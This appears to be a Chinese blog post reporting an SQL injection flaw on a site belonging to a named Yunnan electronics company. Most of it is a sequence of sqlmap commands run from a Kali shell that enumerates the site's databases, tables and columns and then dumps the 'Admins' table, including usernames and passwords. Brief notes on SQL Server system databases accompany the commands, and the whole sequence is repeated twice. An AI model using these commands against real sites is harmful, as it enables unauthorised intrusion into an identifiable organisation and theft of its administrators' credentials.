云南南天电子信息产业股份有限公司某站SQL注入漏洞
2016-06-02 11:42
411 查看
220.163.13*.**
root@kali:~# sqlmap -u http://www.****.com.cn/****.Aspx?keyword= -v 1 --dbs --tamper=space2comment --level 3
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
4个系统级库
master : 起主要控制的作用
master数据库控制SQL Server的所有方面。这个数据库中包括所有的配置信息、用户登录信息、当前正在服务器中运行的过程的信息。
model : 模板
当你建立一个新数据库时,SQL Server会把model数据库中的所有对象建立一份拷贝并移到新数据库中。
tempdb : 临时,访问
供所有来访问你的SQL Server的用户使用,作为用户访问时的容器所用.
msdb : 用户用
所有的任务调度、报警、操作员都存储在msdb数据库中。该库的另一个功能是用来存储所有备份历史。SQL Server Agent将会使用这个库。
root@kali:~# sqlmap -u http://www.****.com.cn/****.Aspx?keyword= -v 1 --table -D 'nantian_web' --tamper=space2comment --level 3 --threads 3
root@kali:~# sqlmap -u http://www.****.com.cn/****.Aspx?keyword= -v 1 --columns -T "Admins" -D 'nantian_web' --tamper=space2comment --level 3 --threads 3
root@kali:~# sqlmap -u http://www.****.com.cn/****.Aspx?keyword= -v 1 --dump -C "id,Name,gsname,username,password,contents,tel" -T "Admins" -D 'nantian_web' --tamper=space2comment --level 3 --threads 3
root@kali:~# sqlmap -u http://www.****.com.cn/****.Aspx?keyword= -v 1 --dbs --tamper=space2comment --level 3
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
4个系统级库
master : 起主要控制的作用
master数据库控制SQL Server的所有方面。这个数据库中包括所有的配置信息、用户登录信息、当前正在服务器中运行的过程的信息。
model : 模板
当你建立一个新数据库时,SQL Server会把model数据库中的所有对象建立一份拷贝并移到新数据库中。
tempdb : 临时,访问
供所有来访问你的SQL Server的用户使用,作为用户访问时的容器所用.
msdb : 用户用
所有的任务调度、报警、操作员都存储在msdb数据库中。该库的另一个功能是用来存储所有备份历史。SQL Server Agent将会使用这个库。
root@kali:~# sqlmap -u http://www.****.com.cn/****.Aspx?keyword= -v 1 --table -D 'nantian_web' --tamper=space2comment --level 3 --threads 3
root@kali:~# sqlmap -u http://www.****.com.cn/****.Aspx?keyword= -v 1 --columns -T "Admins" -D 'nantian_web' --tamper=space2comment --level 3 --threads 3
root@kali:~# sqlmap -u http://www.****.com.cn/****.Aspx?keyword= -v 1 --dump -C "id,Name,gsname,username,password,contents,tel" -T "Admins" -D 'nantian_web' --tamper=space2comment --level 3 --threads 3
相关文章推荐
- 数据库复制及文件读写的bug
- oracle中的sql%rowcoun
- mongodb利用foreach查询和游标遍历(mongodb 遍历对象)
- 常用的MySQL语句写法 --非原创(原创作者:菠萝大象)
- 常用的MySQL复杂查询语句写法 --非原创(原创作者:菠萝大象)
- Mysql参数优化
- redis集群
- redis哨兵(sentinel)系统
- mysql复制表结构创建新表
- mysql-protocol中对编码长度整数型的规则
- 人脸集数据库
- 【Mybatis】数据插入数据库时,获取自增主键
- mysql建表建索引
- Windows下MySql错误代码1045的解决方法
- MSSQL大全
- sql查询最大id
- 学习Microsoft SQL Server 2008技术内幕:T-SQL语法基础
- MongoDB入门
- PostgreSQL中如何查看一个表所对应的文件
- MySQL使用可重复读作为默认隔离级别的原因之一